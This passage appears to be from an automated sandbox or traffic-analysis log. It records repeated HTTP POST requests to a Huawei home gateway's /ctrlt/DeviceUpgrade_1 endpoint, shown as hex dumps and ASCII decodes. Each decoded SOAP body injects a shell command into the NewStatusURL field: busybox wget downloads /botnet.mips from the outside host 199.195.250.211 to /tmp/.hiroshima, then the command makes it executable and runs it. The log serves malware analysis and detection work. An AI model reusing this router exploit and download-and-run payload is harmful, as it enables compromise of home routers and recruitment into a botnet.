3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 